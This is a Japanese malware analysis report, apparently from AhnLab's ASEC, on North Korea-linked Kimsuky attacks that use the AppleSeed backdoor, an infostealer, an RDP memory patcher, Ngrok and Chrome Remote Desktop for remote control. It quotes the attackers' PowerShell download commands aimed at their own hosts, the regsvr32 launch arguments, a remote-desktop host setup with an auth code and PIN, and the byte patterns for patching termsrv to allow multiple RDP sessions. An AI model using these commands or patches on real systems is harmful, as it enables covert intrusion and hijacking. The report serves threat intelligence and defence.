AhnLab Security Emergency response Center (ASEC)では最近、Kimsuky 攻撃グループが Chrome リモート デスクトップを悪用していることを確認した。Kimsuky 攻撃グループは感染システムの制御権を獲得するため、自主制作したマルウェアである AppleSeed のほかにも Meterpreter のような遠隔操作マルウェアを使用しており[1]、VNC をカスタマイズして使用する、または RDP Wrapper のような遠隔操作ツールを悪用した履歴も確認され続けている。[2] ここでは、最近確認された Chrome リモート デスクトップの悪用事例を整理する。
Kimsuky 攻撃グループは北朝鮮の支援を受けていることが確認されている脅威グループであり、2013年から活動している。最初期には韓国の北朝鮮関連研究機関等に攻撃を行っており、2014年に韓国のエネルギー機関に対する攻撃が、そして2017年以降は韓国以外の国に対しても攻撃事例が確認されている。[3]
1. 攻撃フロー
最近、Kimsuky グループはマルウェアの配布プロセスにおいて主に不正なアレアハングル、および MS Office ドキュメントファイルや CHM フォーマットを使用している。これらのマルウェアが添付されたスピアフィッシングメールを受け取ったユーザーは、正常なドキュメントファイルであると認識してファイルを実行し、それによってさらなるマルウェアがシステムにインストールされる場合がある。AppleSeed の配布プロセスでは主にドキュメントファイルの拡張子を偽装した WSF や JS のようなスクリプトが使用されている。このマルウェアを実行すると、マルウェアの実行と同時に正常なドキュメントファイルが実行されるため、ユーザーは正常なドキュメントファイルを開いたと認知する可能性がある。
最初の配布方式は確認されていないが、以下のような当社 AhnLab Smart Defense (ASD)ログの結果により、Kimsuky 攻撃グループは WSF や JS のようなスクリプトマルウェアを攻撃に使用したものと推定される。このログは、過去の事例でもドロッパー機能を担うスクリプトマルウェアが PowerShell コマンドを利用してファイルをデコードするプロセスで使用された。
デコードされたマルウェアは AppleSeed であり、以下のような引数を利用して実行した。引数のうち「/I」に入力される「123qweASDZXC」は AppleSeed 実行時に必要な条件であり、この引数が使用されない場合 AppleSeed は作動しない。
| > powershell.exe -windowstyle hidden cmd /c cmd /c regsvr32.exe /s /n /i:123qweASDZXC C:\Windows\..\ProgramData\o5C2anK.efgL |
その後、攻撃者は AppleSeed を利用して様々な追加のマルウェアをインストールした。これには、過去から Kimsuky グループが使用し続けているインフォスティーラー、RDP Patcher マルウェアと Ngrok がある。このほかにも、攻撃者がリモートで感染システムを操作できるように、Chrome リモート デスクトップをインストールするログも同時に確認されている。
2. 攻撃プロセスで使用されたマルウェアの解析
2.1. AppleSeed
AppleSeed は2019年頃から確認されているマルウェアであり、Kimsuky 攻撃グループの攻撃事例の相当数において確認されているバックドア型マルウェアである。ASEC ブログにおいても AppleSeed を用いた様々な攻撃事例を公開している。[4] [5] [6] AppleSeed は C&C サーバーから渡された攻撃者のコマンドを実行する、またはさらなるマルウェアのインストール、キーロガーおよびスクリーンキャプチャ、そしてユーザーシステムのファイルを窃取する等、様々な機能をサポートしている。
現在攻撃に使用された AppleSeed は2種類であり、どちらも C&C サーバーとの通信に HTTP プロトコルを使用する。2つの AppleSeed のうち1つは、実行時に以下のように引数が必要な形式である。
| > regsvr32.exe /s /n /i:123qweASDZXC C:\Windows\..\ProgramData\o5C2anK.efgL” |
| マルウェア | プロトコル | パス | 引数 |
|---|---|---|---|
| AppleSeed | HTTP | %APPDATA%Adobe\Service\AdobeService.dll | 123qweASDZXC |
| AppleSeed | HTTP | %APPDATA%EastSoft\Control\Service\EastSoftUpdate.dll | N/A |
2.2. インフォスティーラー
Kimsuky 攻撃グループは AppleSeed のインストール後、様々なマルウェアを追加でインストールする傾向がある。代表的には情報窃取マルウェアがあるが、過去には Google Chrome Web ブラウザを対象にアカウント情報を収集して以下のパスにテキストファイル形式で保存するインフォスティーラーが使用された。
- Chrome の窃取情報の保存パス : C:\ProgramData\Adobe\mui.db
最近では更にアップグレードした形式として、Google Chrome 以外の Microsoft Edge や NAVER whale Web ブラウザに保存されているアカウント情報を窃取するマルウェアが使われている。参考に、このマルウェアは去年初めて確認されたものであり、類似するタイプではなく同じマルウェアが使用され続けている点が特徴である。
| アカウント情報窃取対象の Web ブラウザ | アカウント情報保存パス |
|---|---|
| Google Chrome | C:\ProgramData\Adobe\ch.db |
| Microsoft Edge | C:\ProgramData\Adobe\ed.db |
| NAVER whale | C:\ProgramData\Adobe\nw.db |
攻撃者は、当該パスにテキストファイル形式で保存されたユーザーのアカウント情報を AppleSeed や他のマルウェアを利用して奪取するものと推定される。
2.3. RDP Patcher
一般的な Windows 環境では、1台の PC に1つの RDP 接続のみが許容される。そのため、攻撃者が感染先システムのアカウント情報を知っていたとしても既存ユーザーがローカルで作業中である、またはユーザーが RDP を利用して現在のシステムに接続して使用している場合は、ユーザーに認知されずに RDP 接続をすることは不可能である。現在のユーザーが作業している環境で攻撃者が RDP 接続を試みた場合、既存ユーザーはログオフになるためである。
これを回避するための方式として、Remote Desktop Service のメモリにパッチを適用してマルチリモートデスクトップ接続を許容させる方法がある。代表的な例としては Mimikatz も ts::multirdp コマンドによってこのような機能をサポートしている。ts::multirdp コマンドを使用すると、現在実行中の Remote Desktop Service、すなわち termsrv.dll をロードした svchost.exe から当該 DLL のアドレスを取得した後、特定のバイナリパターンを検索する。これは Windows のバージョンごとに異なるため、各バージョンに応じて検索パターンが定義されている。定義されたパターンが存在すると、これを新たなバイナリパターンとしてパッチを適用し、パッチ後はマルチ RDP が可能になる。
Kimsuky グループは、マルチ RDP のためのメモリパッチを担うマルウェアを使用し続けている。現在確認されているマルウェアは x64 Windows アーキテクチャに対してのみ動作し、去年から攻撃に使用されている。過去の RDP Patcher マルウェアには PDB 情報が存在せず、DLL 名の「hp_aux_multirdp.dll」のみが確認されていた。現在確認されているマルウェアは、以下のような PDB 情報を持っていることが特徴である。
- PDB パス情報 : E:\00.duty\03.source\01.pc\pc-engine\hope\x64\Release\hp_aux_multirdp.pdb
検索パターンおよびパッチのパターンは Mimikatz のソースコードと類似しているが、Windows XP バージョンにも対応しているという違いがある。以下は、各 Windows バージョンにおける検索パターンおよびパッチするパターンのリストである。
| Windows バージョン (x64) | 検索パターン | パッチパターン |
|---|---|---|
| Windows XP ( 2600 ) 以上 |
{0x83, 0xf8, 0x02, 0x7f} | {0x90, 0x90} |
| Windows Vista ( 6000 ) |
{0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x75}; | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb}; |
| Windows 7 ( 7600 ) |
{0x39, 0x87, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84}; | {0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; |
| Windows 8.1 ( 9600 ) |
{0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84}; | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; |
| Windows 10, Version 1803 ( 17134 ) |
{0x8b, 0x99, 0x3c, 0x06, 0x00, 0x00, 0x8b, 0xb9, 0x38, 0x06, 0x00, 0x00, 0x3b, 0xdf, 0x0f, 0x84}; | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0xe9}; |
| Windows 10, Version 1809 ( 17763 ) 以上 |
{0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84}; | {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}; |
2.4. Ngrok
Ngrok はトンネリングプログラムであり、外部から NAT 環境内部に存在するシステムに接続できるように公開するツールである。Kimsuky 攻撃グループは、攻撃のプロセスで Ngrok を頻繁に使用している。直接的な使用事例は確認されていないが、感染システムへリモートデスクトップ接続を行うことが目的と見られる。
Kimsuky 攻撃グループは感染システムの制御権を獲得するため、リモートデスクトップサービスを使用する傾向がある。これにより RDP Wrapper や上記の RDP Patcher 等、RDP と関連する様々なマルウェアが頻繁に使用される。しかし、感染システムが NAT 環境の内部に存在する場合、IP およびアカウント情報を知っていたとしてもリモートデスクトップでの接続は不可能である。Kimsuky 攻撃グループはこれらの問題を解決するために Ngrok を使用しているものと見られ、実際に確認された攻撃事例の多くで Ngrok が共に確認されている。
攻撃者は以下のようなコマンドを AppleSeed に渡し、外部から Ngrok をインストールした。現在 NAVER メールの URL からはダウンロードができないが、コマンド実行時点とダウンロードパスを通じて Ngrok がアップロードされたアドレスであるものと推定される。参考に Ngrok が ProgramData フォルダー内に svchost.exe という名前でインストールされるケースは、過去から続けて確認されている。
| > powershell wget hxxp://****[.]kr/gnuboard4/ngsvc.dat -outfile c:\programdata\svchost.exe > powershell wget hxxps://bigfile.mail.naver[.]com/download?fid=lekqm6cmwzu9hqujfovzfq2lfamjkogzkqgrkoewkoeqkabjkxmlkaulfqula3ydaxgrp63cm4u9mopvmqbmpxm/kzk0kzewkxbmfqvxp2== -outfile c:\programdata\svchost.exe |
3. Chrome リモート デスクトップ
Kimsuky 攻撃グループは AppleSeed や Meterpreter のようなバックドア型マルウェアを利用して感染システムの制御権を獲得したあとも、GUI 環境の遠隔操作のためにさらなるマルウェアをインストールしている。Windows の RDP プロトコルを使用する場合は上記で取り上げた複数のマルウェアが使用される恐れがあり、多数の攻撃事例で RDP Wrapper を追加でインストールする事例も存在する。
もちろん、RDP プロトコル以外に TinyNuke や TightVNC のような VNC マルウェアを直接制作してリモートデスクトップによる操作を実行する場合もある。[7]最近では、Google の Chrome リモート デスクトップを悪用する事例が確認されている。
Google は Chrome リモート デスクトップという機能をサポートしている。特定のシステムにユーザーのアカウントでリモートデスクトッププログラムをインストールすると、他のシステムから Chrome Web ブラウザに当該システムの遠隔操作機能を提供する機能である。一般的に、遠隔操作の対象となるシステムの Chrome ブラウザで遠隔操作を設定する方式がほとんどであるが、Chrome は直接遠隔操作のホストプログラムをインストールする方法もサポートしている。
例えば、遠隔操作対象の機器に Chrome 遠隔操作ホストプログラムをインストールしたあと、以下のような引数と共にコマンドラインの命令を実行できる。このコマンドは Chrome Web ブラウザでログインした後に生成でき、認証コードは毎回変更される。
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”認証コード” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% |
上記のようなコマンドを実行したあと PIN 番号を入力すると、その後 Chrome Web ブラウザで遠隔操作対象の機器がオンライン状態であることを表示する。当該機器に接続し、Chrome 遠隔操作ホストの実行時に入力した PIN 番号を入力すれば、Chrome Web ブラウザで遠隔操作が可能になる。
攻撃者はまず AppleSeed に以下のような PowerShell コマンドを渡して Chrome リモート デスクトップのホストインストーラーをインストールし、インストールが完了すると Chrome リモート デスクトップのホストを制御する 23.bat ファイルをインストールした。
| > powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -outfile c:\programdata\cm.msi > powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\programdata\23.bat |
23.bat ファイルは上記の Chrome リモート デスクトップ実行コマンドに類似しており、「-pin」引数が同時に使用され、コマンドライン上でも追加のタスクなしで動作できるようにしている。攻撃に使用された認証コードは攻撃者の Google アカウントで作成されたものであり、攻撃者は Chrome Web ブラウザから感染システムを操作できるようになる。
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% –pin=230625 |
4. 結論
Kimsuky 攻撃グループは韓国国内のユーザーを対象にスピアフィッシング攻撃を持続的に実行している。主にメールの添付ファイルでドキュメントファイルに偽装したマルウェアを配布する方式であり、ユーザーがこれを実行する場合、現在使用中のシステムの操作権限が奪取されることがある。
Kimsuky 攻撃グループは感染システムの制御権を奪取するために AppleSeed や Meterpreter、そして VNC マルウェアを使用しており、Windows システムにデフォルトで備わっている RDP リモートデスクトップサービスを悪用することもある。最近では、遠隔操作のために Google Chrome リモート デスクトップ機能を悪用する事例も確認されている。
ユーザーは疑わしいメールを受信した場合は添付ファイルを開かないようにしなければならず、V3 を最新バージョンにアップデートし、マルウェアの感染を事前に遮断できるよう注意を払わなければならない。
ファイル検知
– Downloader/BAT.Agent (2023.06.27.03)
– Backdoor/Win.AppleSeed.R588872 (2023.06.27.02)
– Trojan/Win.Akdoor.R470485 (2022.02.05.00)
– Trojan/Win.Generic.R577010 (2023.05.15.02)
ビヘイビア検知
– Execution/MDP.Regsvr32.M4470
– Execution/EDR.Regsvr32.M11168 (EDR)
– Execution/MDP.Regsvr32.M11169 (MDS)
IOC
MD5
– 80f381a20d466e7a02ea37592a26b0b8 : AppleSeed (AdobeService.dll)
– b6d11017e02e7d569cfe203eda25f3aa : AppleSeed (EastSoftUpdate.dll)
– d2eb306ee0d7dabfe43610e0831bef49 : InfoStealer
– d6a38ffdbac241d69674fb142a420740 : RDP Patcher
– 946e1e0d2e0d7785d2e2bcd3634bcd2a : リモート デスクトップランチャー (23.bat)
ダウンロードアドレス
– hxxps://bigfile.mail.naver[.]com/download?fid=lekqm6cmwzu9hqujfovzfq2lfamjkogzkqgrkoewkoeqkabjkxmlkaulfqula3ydaxgrp63cm4u9mopvmqbmpxm/kzk0kzewkxbmfqvxp2== : Ngrok
C&C
– hxxp://getara1.mygamesonline[.]org/ : AppleSeed (AdobeService.dll)
– hxxp://pikaros2.r-e[.]kr/ : AppleSeed (EastSoftUpdate.dll)
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報